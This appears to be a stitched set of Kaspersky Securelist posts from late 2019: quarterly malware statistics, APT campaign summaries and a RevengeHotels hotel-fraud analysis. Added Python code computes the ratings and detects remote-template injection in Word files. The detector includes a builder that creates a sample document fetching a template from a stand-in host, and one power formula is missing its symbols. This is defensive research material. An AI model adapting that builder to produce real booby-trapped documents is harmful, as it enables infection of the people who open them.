Network attacks are still widespread. This quarter, as in previous ones, we registered numerous attempts to exploit vulnerabilities in the SMB protocol. This indicates that unprotected and unpatched systems are still at high risk of infection in attacks that deploy EternalBlue, EternalRomance, and other exploits. That said, a large share of malicious network traffic is made up of requests aimed at brute-forcing passwords for popular network services and servers, such as Remote Desktop Protocol and Microsoft SQL Server. RDP faced other problems too, related to the discovery of several vulnerabilities in this network protocol grouped under the common name DejaBlue (CVE-2019-1181, CVE-2019-1182, CVE-2019-1222, CVE-2019-1223, CVE-2019-1224, CVE-2019-1225, CVE-2019-1226). Unlike the previously discovered CVE-2019-0708, these vulnerabilities affect not only old versions of operating systems but new ones as well, such as Windows 10. As in the case of CVE-2019-0708, some DejaBlue vulnerabilities do not require authentication on the attacked system and allow malicious activity to be carried out unnoticed by the user. It is therefore vital to promptly install the latest updates for both the operating system and antivirus solutions to reduce the risk of infection.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries that are sources of web-based attacks: TOP 10

The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q3 2019, Kaspersky solutions blocked 989,432,403 attacks launched from online resources located in 203 countries across the globe. 560,025,316 unique URLs triggered Web Anti-Virus components.

Distribution of web-based attack sources by country, Q3 2019

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

    Country*          % of attacked users**
1   Tunisia           23.26
2   Algeria           19.75
3   Albania           18.77
4   Réunion           16.46
5   Bangladesh        16.46
6   Venezuela         16.21
7   North Macedonia   15.33
8   France            15.09
9   Qatar             14.97
10  Martinique        14.84
11  Greece            14.59
12  Serbia            14.36
13  Syria             13.99
14  Bulgaria          13.88
15  Philippines       13.71
16  UAE               13.64
17  Djibouti          13.47
18  Morocco           13.35
19  Belarus           13.34
20  Saudi Arabia      13.30

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky products in the country.

These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data.

On average, 10.97% of Internet user computers worldwide experienced at least one Malware-class attack.

Geography of malicious web-based attacks, Q3 2019

Local threats

Statistics on local infections of user computers are an important indicator. They cover objects that reached the target computer by infecting files or removable media, or that initially arrived on the computer in a non-obvious form (for example, programs inside complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q3 2019, our File Anti-Virus detected 230,051,054 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that this rating only includes attacks by malicious programs that fall under the Malware class; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.
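The per-country ratings in this section, for web attacks, banking malware and local threats alike, are all computed the same way: the number of unique users with a qualifying detection, divided by all users of the product in that country, with small countries excluded and non-Malware-class detections (RiskTool, adware) left out. The Python below is an added illustration of that computation, not Kaspersky's own pipeline; the telemetry records are constructed, and the exclusion threshold is lowered from the report's 10,000 users to 3 so that the sample stays small.

```python
"""Per-country "share of attacked users" rating.

Added example of the methodology described in the report, not Kaspersky's
code. Records are constructed; the threshold is an assumption for the sample.
"""
from collections import defaultdict

MIN_USERS = 3                      # report uses 10,000 (50,000 for some ratings)
COUNTED_CLASSES = {"Malware"}      # RiskTool / adware detections are not counted

# Constructed telemetry: (country, user_id, detection_class or None).
# A user appears once per event; None means the user had no detection.
SAMPLE_EVENTS = [
    ("AA", "u1", "Malware"), ("AA", "u1", "Malware"),   # same user hit twice
    ("AA", "u2", "RiskTool"), ("AA", "u3", None), ("AA", "u4", None),
    ("BB", "u5", "Malware"), ("BB", "u6", "Malware"), ("BB", "u7", None),
    ("CC", "u8", "Malware"), ("CC", "u9", None),        # too few users
]


def rate_countries(events, min_users=MIN_USERS, counted=COUNTED_CLASSES):
    """Return [(country, percent_of_users_attacked)] sorted high to low.

    A user counts once however many detections they had, and only
    detections in `counted` classes make a user 'attacked'.
    """
    users = defaultdict(set)
    attacked = defaultdict(set)
    for country, user, det_class in events:
        users[country].add(user)
        if det_class in counted:
            attacked[country].add(user)
    rating = []
    for country, all_users in users.items():
        if len(all_users) < min_users:
            continue                       # excluded from the rating
        share = round(100 * len(attacked[country]) / len(all_users), 2)
        rating.append((country, share))
    rating.sort(key=lambda cs: (-cs[1], cs[0]))
    return rating


def global_share(events, counted=COUNTED_CLASSES):
    """Worldwide share of users with at least one counted detection.

    Unlike the rating, this uses every user, including those in countries
    that fall below the threshold.
    """
    all_users = {user for _, user, _ in events}
    hit = {user for _, user, det_class in events if det_class in counted}
    return round(100 * len(hit) / len(all_users), 2)


if __name__ == "__main__":
    for rank, (country, share) in enumerate(rate_countries(SAMPLE_EVENTS), 1):
        print(f"{rank:<3}{country:<6}{share:>6.2f}")
    print("worldwide:", global_share(SAMPLE_EVENTS))
```

Two details matter when reproducing such a rating from raw detections: deduplicating users before dividing (the repeated hits on `u1` count once) and applying the class filter before counting, since a country whose only detections are RiskTool shows up with a 0% share rather than being dropped.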

    Country*       % of attacked users**
1   Afghanistan    53.45
2   Tajikistan     48.43
3   Yemen          48.39
4   Uzbekistan     48.38
5   Turkmenistan   45.95
6   Myanmar        45.27
7   Ethiopia       44.18
8   Laos           43.24
9   Bangladesh     42.96
10  Mozambique     41.58
11  Syria          41.15
12  Vietnam        41.11
13  Iraq           41.09
14  Sudan          40.18
15  Kyrgyzstan     40.06
16  China          39.94
17  Rwanda         39.49
18  Venezuela      39.18
19  Malawi         38.81
20  Nepal          38.38

These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera memory cards, phones and external hard drives.

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country.

Geography of local infection attempts, Q3 2019

Overall, 21.1% of user computers globally faced at least one Malware-class local threat during Q3.

The figure for Russia was 24.24%.

IT threat evolution Q3 2019

29 November, 2019 - 11:00

Targeted attacks and malware campaigns

Mobile espionage targeting the Middle East

At the end of June we reported the details of a highly targeted campaign that we dubbed ‘Operation ViceLeaker’ involving the spread of malicious Android samples via instant messaging. The campaign affected several dozen victims in Israel and Iran. We discovered this activity in May 2018, right after Israeli security agencies announced that Hamas had installed spyware on the smartphones of Israeli soldiers, and we released a private report on our Threat Intelligence Portal. We believe the malware has been in development since late 2016, but the main distribution began at the end of 2017. The attackers used two methods to install these implants: they backdoored legitimate apps, injecting malicious Smali code; and they built an open-source legitimate ‘Conversations’ messenger that included the malicious code. You can read more about Operation ViceLeaker here.

APT33 beefs up its toolset

In July, we published an update on the 2016-17 activities of NewsBeef (aka APT33 and Charming Kitten), a threat actor that has focused on targets in Saudi Arabia and the West. NewsBeef lacks advanced offensive capabilities and has previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. In previous campaigns, this threat actor has relied heavily on the Browser Exploitation Framework (BeEF). However, in the summer of 2016, the group deployed a new toolset that included macro-enabled Office documents, PowerSploit, and the Pupy backdoor. The most recent campaign uses this toolset in conjunction with spear-phishing emails, links sent over social media and standalone private messaging applications, and watering-hole attacks that use compromised high-profile websites (some belonging to the Saudi government). The group has changed multiple characteristics year over year – tactics, the malicious JavaScript injection strategically placed on compromised websites, and command-and-control (C2) infrastructure. Subscribers to our private intelligence reports receive unique and extraordinary data on significant activity and campaigns of more than 1009 APTs from across the world, including NewsBeef.

New FinSpy iOS and Android implants found in the wild

We recently reported on the latest versions of FinSpy for Android and iOS. Governments and law enforcement agencies across the world use this surveillance software to collect personal data. FinSpy implants for iOS and Android have almost identical functionality: they are able to collect personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges by abusing known vulnerabilities. The iOS version doesn’t provide infection exploits for its customers and so can only be installed on jailbroken devices – suggesting that physical access is required in order to install the implant. During our latest research we detected up-to-date versions of these implants in almost 20 countries, but we think the actual number of infections could be much higher.

Turla revamps its toolset

Turla (aka Venomous Bear, Uroboros and Waterbug), a high profile Russian-speaking threat actor with a known interest in cyber-espionage against government and diplomatic targets, has made significant changes to its toolset. Most notably, the group has wrapped its notorious JavaScript KopiLuwak malware in a new dropper called Topinambour, a new .NET file that is being used by Turla to distribute and drop its JavaScript KopiLuwak through infected installation packages for legitimate software programs such as VPNs for circumventing internet censorship. Named by the malware authors, Topinambour is an alternative name for the Jerusalem artichoke. Some of the changes the threat actor has made are intended to help it evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. Further, the malware is almost completely ‘fileless’: the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer’s registry for the malware to access when ready. The two KopiLuwak analogues – the .NET RocketMan Trojan and the PowerShell MiamiBeach Trojan – are used for cyber-espionage. We think the threat actor deploys these versions when the computers of the targets are protected with security software capable of detecting KopiLuwak. All three implants are able to fingerprint targets, gather information on system and network adapters, steal files, and download and execute additional malware. MiamiBeach is also able to take screenshots. You can read more here.

CloudAtlas uses new infection chain

Cloud Atlas (aka Inception) has a long history of cyber-espionage operations targeting industries and government bodies. We first reported this group in 2014 and we have continued to track its activities. During the first half of this year, we identified campaigns focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts. Cloud Atlas hasn’t changed its TTPs (Tactics, Techniques and Procedures) since 2018 and continues to rely on existing tactics and malware to compromise high value targets. The threat actor’s Windows intrusion set still uses spear-phishing emails to target its victims: these are crafted with Office documents that use malicious remote templates – whitelisted per victim – hosted on remote servers. Previously, Cloud Atlas dropped its ‘validator’ implant, named PowerShower, directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. In recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed in 2014.

Dtrack banking malware discovered

In summer 2018, we discovered ATMDtrack, a piece of banking malware targeting banks in India. We used YARA and the Kaspersky Attribution Engine to try to uncover more information about this ATM malware; and we found more than 180 new malware samples of a spy tool that we now call Dtrack. All the Dtrack samples we initially found were dropped samples, as the real payload was encrypted with various droppers – we were able to find them because of the unique sequences shared by ATMDtrack and the Dtrack memory dumps. Once we decrypted the final payload and used the Kaspersky Attribution Engine again, we saw similarities with the DarkSeoul campaign, dating back to 2013 and attributed to the Lazarus group. It seems that they reused part of their old code to attack the financial sector and research centers in India. Our telemetry indicates that the latest Dtrack activity was detected in the beginning of September 2019. This is a good example of how proper YARA rules and a solid working attribution engine can help to uncover connections with established malware families. In this case, we were able to add another family to the Lazarus group’s arsenal: ATMDtrack and Dtrack. You can find our public report on Dtrack here.

Other security news

Sodin ransomware attacks MSP

In April, the Sodin ransomware (aka Sodinokibi and REvil) caught our attention, not least because of the way it spread. The Trojan exploited the CVE-2019-2725 vulnerability to execute a PowerShell command on a vulnerable Oracle WebLogic server, allowing the attackers to upload a dropper to the server, which then installed the ransomware payload. Patches for this vulnerability were released in April, but at the end of June a similar vulnerability was discovered – CVE-2019-2729. Sodin also carried out attacks on MSPs. In some cases, the attackers used the Webroot and Kaseya remote access consoles to deliver the Trojan. In others, the attackers penetrated MSP infrastructure using an RDP connection, elevated privileges, deactivated security solutions and backups, and then downloaded the ransomware to client computers. This ransomware was also unusual because it didn’t require the victim to carry out any action. Our statistics indicated that most victims were located in the Asia-Pacific region, including Taiwan, Hong Kong and South Korea.

Ransomware continues to be a major headache for consumers and businesses alike. Recovering data that a ransomware Trojan has encrypted is often impossible. However, in some cases we are able to do so. Recent examples include the Yatron and FortuneCrypt malware. If you ever face a situation where a ransomware Trojan has encrypted your data, and you don’t have a backup, it’s always worth checking the No More Ransom site, to see if a decryptor is available. You can find our decryptors for both of the above ransomware programs here and here.

The impact of web mining

Malicious miners are programs designed to hijack the victim’s CPU in order to mine crypto-currencies. The business model is simple: infect the computer, use the processing power of their CPU or GPU to generate coins and earn real-world money through legal exchanges and transactions. It’s not obvious to the victim that they are infected – most people seldom use most of their computer’s processing power and miners harness the 70-80% that is not being used for anything else. Miners can be installed along with adware, hacked games and other pirated content. However, there’s also another model – using an embedded mining script that starts when the victim opens an infected web page. Where a corporate network has been infected, the CPU capacity available to the cybercriminals can be huge. But what impact does mining have? We recently tried to quantify the economic and environmental impact of web miners; and thereby evaluate the positive benefit of protecting against mining.

The total power saving can be calculated using the formula ·N, where is the average value of the increase in power consumption of the victim’s device during the web mining process, and N is the number of blocked attempts according to KSN (Kaspersky Security Network) data for 2018. This figure is equal to 18.8±11.8 gigawatts (GW) – twice the average power consumption rate of all Bitcoin miners in the same year. To assess the amount of saved energy based on this power consumption rate, this number is multiplied by the average time that victim devices spend on web mining; that is, according to the formula ‘·N·t’, where ‘t’ is the average time that web miners would have been working had they not been blocked by our products. Since this value cannot be obtained from Kaspersky data, we used information from open sources provided by third-party researchers, according to which the estimated amount of electricity saved by users of our products ranges from 240 to 1,670 megawatt hours (MWh). Using the average prices for individual consumers, this amount of electricity could cost up to $200,000 for residents in North America or up to €250,000 for residents in Europe.

You can read our report here.

Mac OS threat landscape

Some people still believe that there are no serious threats for Mac OS. There are certainly fewer threats than for Windows, mainly because more people run Windows, so there is a bigger pool of potential victims for attackers to target. However, as the number of people running Mac OS has grown, so has the number of threats targeting them.

Our database currently contains 206,759 unique malicious and potentially unwanted files for Mac OS. From 2012 to 2017, the number of people facing attack grew year by year, reaching a peak in 2017, when we blocked attacks on around 255,000 computers running Mac OS. Since then, there has been a drop; and in the first half of 2019, we blocked around 87,000 attacks. The majority of threats for Mac OS in 2019 fell into the adware category – these threats are easier to create, offering a better return on investment for cybercriminals.

The number of phishing attacks targeting Mac OS has also increased year by year. During the first half of 2019, we detected nearly 6 million phishing attacks, 11.8% of which targeted corporate users. The countries facing the most phishing attacks were Brazil (30.87%), India (22.08%) and France (22.02%). The number of phishing attacks seeking to exploit the Apple brand name has also grown in recent years – by around 30-40% each year. In 2018, there were nearly 1.5 million such attacks; and in the first half of 2019 alone, the number exceeded 1.6 million – already an increase of 9% over the previous year.

You can read our report on the current Mac OS threat landscape here.

Smart home vulnerabilities

One of our colleagues chose to turn his home into a smart home and installed a Fibaro Home Center system, so that he could remotely manage smart devices in the house, including lights, heating system, fridge, stereo system, sauna heater, smoke detectors, flood sensors, IP cameras and doorbell. He invited researchers from the Kaspersky ICS CERT team to investigate it to see how secure it was. The researchers knew the model of the smart home hub and the IP address. They decided not to look at the Z-Wave protocol, which the smart home hub uses to talk to the appliances, because this required physical proximity to the house. They also discarded the idea of exploiting the programming language interpreter – the Fibaro hub used the patched version.

Our researchers were able to find a remote SQL injection vulnerability, despite the efforts of Fibaro to avoid them, and a couple of remote code execution vulnerabilities in the PHP code. If exploited, these vulnerabilities would allow attackers to get root access rights on the smart hub, giving them full control over it. They also found a severe vulnerability in the Fibaro cloud that could allow an attacker to access all backups uploaded from Fibaro hubs around the world. This is how our research team acquired the backup data stored by the Fibaro Home Center located in this particular home. Among other things, this backup contains a database file with a lot of personal information, including the house’s location, geo-location data from the owner’s smartphone, the email address used to register with Fibaro, information about smart devices in the owner’s home and even the owner’s password. Credit to Fibaro Group not only for creating a rather secure product but also for working closely with our researchers to quickly patch the vulnerabilities we reported to them. You can read the full story here.

Security of smart buildings

This quarter we also looked at the security of automation systems in buildings – sensors and controllers to manage elevators, ventilation, heating, lighting, electricity, water supply, video surveillance, alarm systems, fire extinguishing systems and more in industrial facilities. Such systems are used not only in office and residential buildings but also in hospitals, shopping malls, prisons, industrial production, public transport and other places where large work and/or living areas need to be controlled. We looked at the live threats to building-based automation systems to see what malware their owners encountered in the first six months of 2019.

Most of the blocked threats were neither targeted, nor specific to building-based automation systems, but ordinary malware regularly found on corporate networks unrelated to automation systems. Such threats can still have a significant impact on the availability and integrity of automation systems, from file encryption (including databases) to denial of service on network equipment and workstations because of malicious traffic and unstable exploits. Spyware and backdoors pose a far greater threat, since stolen authentication data and the remote control it provides can be used to plan and carry out a subsequent targeted attack on a building’s automation system.

Smart cars and connected devices

Kaspersky has investigated smart car security several times in recent years (here and here), revealing a number of security issues. As vehicles become smarter and more connected they are also becoming more exposed. However, this doesn’t just apply to smart cars and the apps that support them. There is now a whole industry of after-market devices designed to improve the driving experience – from car scanners to tuning gadgets. In a recent report, we examined a number of connected automotive devices and reviewed their security setup. This exercise provided us with a first look at security issues in these devices. Our review included a couple of auto scanners, a dashboard camera, a GPS tracker, a smart alarm system and a pressure and temperature monitoring system.

We found the security of these devices more or less adequate, leaving aside minor issues. This is partly due to the limited device functionality and a lack of serious consequences in the event of a successful attack. It’s also due to the vigilance of vendors. However, as we move towards a more and more connected future, it’s important to remember that the smarter an object is the more attention should be paid to security in the development and updating of a device: careless development or an unpatched vulnerability could allow an attacker to hijack a victim’s car or spy on an entire car fleet.

We continue to develop KasperskyOS, to help customers secure connected systems – including mobile devices and PCs, internet of things devices, intelligent energy systems, industrial systems, telecommunications systems and transportation systems.

If you’re considering buying a device to make your car a little bit smarter, you should think about the security risks. Check to see if any vulnerabilities affect the device and whether it’s possible to apply security updates to it. Don’t automatically buy the most recently released product, since it might contain a security flaw that hasn’t yet been discovered: the best choice is to buy a product that has already been updated several times. Finally, always consider the security of the ‘mobile dimension’ of the device, especially if you use an Android device: while applications make life easier, once a smartphone is hit by malware a lot can go wrong.

Personal data theft

We’ve become used to a steady stream of reports in the news about data breaches. Recent examples include the theft of 23,205,290 email addresses together with passwords weakly stored as base64 SHA-1 encoded hashes from CafePress. Worryingly, the hack was reported by Have I Been Pwned – CafePress didn’t notify its customers until some months after the breach had occurred.

In August, two Israeli researchers discovered fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database. The exposure of biometric data is of particular concern. If a hacker is able to obtain my password, I can change it, but a biometric is for life.

Facebook has faced criticism on several occasions for failing to handle customers’ data properly. In the latest of a long list of incidents, hundreds of millions of phone numbers linked to Facebook accounts were found online on a server that wasn’t protected with a password. Each record contained a unique Facebook ID and the phone number listed on the account, leaving affected Facebook customers open to spam calls and SIM-swap attacks.

On September 12, mobile gaming company Zynga reported that some player account data may have been accessed illegally by ‘outside hackers’. Subsequently, a hacker going by the name of Gnosticplayers claimed to have breached the player database of Words With Friends, as well as data from Draw Something and the discontinued game OMGPOP, exposing the data of more than 200 million Android and iOS players. While Zynga spotted the breach and notified customers, it’s worrying that passwords were stored in cleartext.

Consumers have no direct control over the security of the personal data they disclose to online providers. However, we can limit the damage of a security breach at an online provider by ensuring that the passwords we create for each service are unique and hard to guess, or by using a password manager to do this for us. By making use of two-factor authentication, where offered by an online provider, we can further reduce the impact of any breach.

It’s also worth bearing in mind that hacking the server of an online provider isn’t the only way that cybercriminals can get their hands on passwords and other personal data. They also harvest data stored on a consumer’s computer directly. This includes data stored in browsers, files from the hard disk, system data, account logins and more. Our data shows that 940,000 people were targeted by malware designed to steal such data in the first half of 2019. We would recommend using specialist software to store account passwords and bank card details, rather than relying on your browser. You can find out more about how cybercriminals target personal data on computers here.

RevengeHotels: cybercrime targeting hotel front desks worldwide

28 November, 2019 - 11:00

RevengeHotels is a targeted cybercrime malware campaign against hotels, hostels, hospitality and tourism companies, mainly, but not exclusively, located in Brazil. We have confirmed more than 20 hotels that are victims of the group, located in eight states in Brazil, but also in other countries such as Argentina, Bolivia, Chile, Costa Rica, France, Italy, Mexico, Portugal, Spain, Thailand and Turkey. The goal of the campaign is to capture credit card data from guests and travelers stored in hotel systems, as well as credit card data received from popular online travel agencies (OTAs) such as Booking.com.

The main attack vector is via email with crafted Word, Excel or PDF documents attached. Some of them exploit CVE-2017-0199, loading the payload with VBS and PowerShell scripts and then installing customized versions of RevengeRAT, NjRAT, NanoCoreRAT, 888 RAT and other custom malware such as ProCC on the victim’s machine. The group has been active since 2015, but increased its attacks in 2019.

In our research, we were also able to track two groups targeting the hospitality sector, using separate but similar infrastructure, tools and techniques. PaloAlto has already written about one of them. We named the first group RevengeHotels, and the second ProCC. These groups use a lot of social engineering in their attacks, asking for a quote from what appears to be a government entity or private company wanting to make a reservation for a large number of people. Their infrastructure also relies on the use of dynamic DNS services pointing to commercial hosting and self-hosted servers. They also sell credentials from the affected systems, allowing other cybercriminals to have remote access to hotel front desks infected by the campaign.

We monitored the activities of these groups and the new malware they are creating for over a year. With a high degree of confidence, we can confirm that at least two distinct groups are focused on attacking this sector; there is also a third group, though it is unclear if its focus is solely on this sector or if it carries out other types of attacks.

Not the quotation you’re expecting

One of the tactics used in operations by these groups is highly targeted spear-phishing messages. They register typo-squatting domains, impersonating legitimate companies. The emails are well written, with an abundance of detail. They explain why the company has chosen to book that particular hotel. By checking the sender information, it’s possible to determine whether the company actually exists. However, there is a small difference between the domain used to send the email and the real one.

An email sent to a hotel supposedly from an attorney’s office

This spear-phishing message, written in Portuguese, has a malicious file attached that misuses the name of a real attorney’s office, while the sender domain of the message was a typo-squatting domain registered one day earlier. The group goes further in its social engineering effort: to convince the hotel personnel of the legitimacy of their request, a copy of the National Registry of Legal Entities card (CNPJ) is attached to the quotation.

The attached file, Reserva Advogados Associados.docx (Attorneys Associates Reservation.docx), is a malicious Word file that drops a remote OLE object via template injection to execute macro code. The macro code inside the remote OLE document contains PowerShell commands that download and execute the final payload.
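A defender can spot the template-injection pattern described above without opening the document in Word: the remote template is declared as an External relationship in one of the package’s `.rels` parts. The checker below is an added example (not code from the Securelist report); it builds two constructed `.docx` samples in memory, one benign and one pointing its attached template at the placeholder URL `template.example.invalid`, and flags only relationship types Word fetches automatically on open.

```python
"""Static check for remote-template / remote-OLE injection in .docx files."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Relationship types that Word resolves automatically when the document opens.
# A hyperlink is also "External" but is only fetched on click, so it is not listed.
AUTO_FETCHED_TYPES = {"attachedTemplate", "oleObject", "frame", "subDocument", "image"}
REMOTE_SCHEMES = {"http", "https", "ftp", "file"}


def _is_remote(target):
    """True for URLs and UNC paths; relative in-package paths return False."""
    return urlparse(target).scheme.lower() in REMOTE_SCHEMES or target.startswith("\\\\")


def find_external_relationships(docx_bytes):
    """Return one finding per auto-fetched relationship that points off the package.

    Each finding is {"part": rels part name, "type": short relationship type,
    "target": remote target}. An empty list means the document's own metadata
    triggers no remote fetch when it is opened."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                if rel_type in AUTO_FETCHED_TYPES and _is_remote(target):
                    findings.append({"part": name, "type": rel_type, "target": target})
    return findings


def _rels(*relationships):
    return (f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{PKG_REL_NS}">{"".join(relationships)}</Relationships>')


def build_docx(settings_rels=(), document_rels=()):
    """Constructed sample input: a minimal .docx (zip of OOXML parts) with extra
    relationships in word/_rels/settings.xml.rels and word/_rels/document.xml.rels.
    Only the .rels parts matter to the checker, so the body is empty."""
    tpl = '<w:attachedTemplate r:id="rId1"/>' if settings_rels else ""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0" encoding="UTF-8"?>'
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("_rels/.rels", _rels(
            f'<Relationship Id="rId1" Type="{OOXML_REL}/officeDocument" Target="word/document.xml"/>'))
        zf.writestr("word/document.xml", f'<?xml version="1.0" encoding="UTF-8"?>'
                    f'<w:document xmlns:w="{W_NS}"><w:body/></w:document>')
        zf.writestr("word/_rels/document.xml.rels", _rels(
            f'<Relationship Id="rId1" Type="{OOXML_REL}/settings" Target="settings.xml"/>', *document_rels))
        zf.writestr("word/settings.xml", f'<?xml version="1.0" encoding="UTF-8"?>'
                    f'<w:settings xmlns:w="{W_NS}" xmlns:r="{OOXML_REL}">{tpl}</w:settings>')
        zf.writestr("word/_rels/settings.xml.rels", _rels(*settings_rels))
    return buf.getvalue()


def make_benign_docx():
    """Ordinary document: its only external relationship is a clickable hyperlink."""
    return build_docx(document_rels=[
        f'<Relationship Id="rId2" Type="{OOXML_REL}/hyperlink" '
        f'Target="https://www.example.com/" TargetMode="External"/>'])


def make_template_injection_docx(template_url):
    """Document whose attached template is a remote .dotm (the pattern described
    in the write-up). template_url is a placeholder supplied by the caller."""
    return build_docx(settings_rels=[
        f'<Relationship Id="rId1" Type="{OOXML_REL}/attachedTemplate" '
        f'Target="{template_url}" TargetMode="External"/>'])


if __name__ == "__main__":
    print(find_external_relationships(make_benign_docx()))  # []
    print(find_external_relationships(
        make_template_injection_docx("http://template.example.invalid/quote.dotm")))
```

The same walk over `.rels` parts applies to `.xlsx` and `.pptx`, since the package relationship format is shared across OOXML.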

PowerShell commands executed by the embedded macro

In the RevengeHotels campaign, the downloaded files are .NET binaries protected with the Yoda Obfuscator. After unpacking them, the code is recognizable as the commercial RAT RevengeRAT. An additional module written by the group, called ScreenBooking, is used to capture credit card data. It monitors whether the user is browsing the targeted web page. In the initial versions, back in 2016, the downloaded files from RevengeHotels campaigns were divided into two modules: a backdoor and a module to capture screenshots. Recently we noticed that these modules had been merged into a single backdoor module able to collect data from the clipboard and capture screenshots.

In this example, the webpage that the attacker is monitoring is booking.com (more specifically, the page containing the card details). The code is specifically looking for data in Portuguese and English, allowing the attackers to steal credit card data from web pages written in these languages.

Title searched by the malware in order to capture the screen contents

In the ProCC campaigns, the downloaded files are Delphi binaries. The backdoor installed in the machine is more customized than that used by RevengeHotels: it’s developed from scratch and is able to collect data from the clipboard and printer spooler, and capture screenshots. Because the personnel in charge of confirming reservations usually need to pull credit card data from OTA websites, it’s possible to collect card numbers by monitoring the clipboard and the documents sent to the printer.

Screenshot is captured when the user copies something to the clipboard or makes a print request

A bad guy’s concierge

According to the relevant underground forums and messaging groups, these criminals also infect front desk machines in order to capture credentials from the hotel administration software; they can then steal credit card details from it too. Some criminals also sell remote access to these systems, acting as a concierge for other cybercriminals by giving them permanent access to steal new data by themselves.

Access to hotel booking systems containing credit card details is sold by criminals as a service

Some Brazilian criminals tout credit card data extracted from a hotel’s system as high quality and reliable because it was extracted from a trusted source, i.e., a hotel administration system.

Message sent to an underground channel selling data extracted from hotel systems

Guests and victims

The majority of the victims are associated with the hospitality sector. Based on the routines used, we estimate that this attack has a global reach. However, based on our telemetry data, we can only confirm victims in the following countries:

Victims confirmed in Argentina, Bolivia, Brazil, Chile, Costa Rica, France, Italy, Mexico, Portugal, Spain, Thailand and Turkey

Based on data extracted from Bit.ly statistics, we can see that potential victims from many other countries have at least accessed the malicious link. This data suggests that the number of countries with potential victims is higher than our telemetry has registered.

Victims per country based on data from a malicious Bit.ly link from the RevengeHotels campaign

A safe stay

RevengeHotels is a campaign that has been active since at least 2015, revealing different groups using traditional RAT malware to infect businesses in the hospitality sector. While there is a marked interest in Brazilian victims, our telemetry shows that their reach has extended to other countries in Latin America and beyond.

The use of spear-phishing emails, malicious documents and RAT malware is yielding significant results for at least two groups we have identified in this campaign. Other threat actors may also be part of this wave of attacks, though there is no confirmation at the current time.

If you want to be a savvy and safe traveler, it’s highly recommended to use a virtual payment card for reservations made via OTAs, as these cards normally expire after one charge. While paying for your reservation or checking out at a hotel, it’s a good idea to use a virtual wallet such as Apple Pay, Google Pay, etc. If this is not possible, use a secondary or less important credit card, as you never know if the system at the hotel is clean, even if the rooms are…

All Kaspersky products detect this threat as:

  • HEUR:Backdoor.MSIL.Revenge.gen
  • HEUR:Trojan-Downloader.MSIL.RevengeHotels.gen
  • HEUR:Trojan.MSIL.RevengeHotels.gen
  • HEUR:Trojan.Win32.RevengeHotels.gen
  • HEUR:Trojan.Script.RevengeHotels.gen
Indicators of compromise (IoCs)

Reference hashes:

For a full list of IoCs as well as the YARA rules and intelligence report for this campaign, please visit the Kaspersky Threat Intelligence Portal: https://tip.kaspersky.com/

Spam and phishing in Q3 2019

26 November, 2019 - 11:00

Quarterly highlights

Amazon Prime

In Q3, we registered numerous scam mailings related to Amazon Prime. Most of the phishing emails with a link to a fake Amazon login page offered new prices or rewards for buying things, or reported problems with membership, etc. Against the backdrop of September’s Prime Day sale, such messages were plausible.

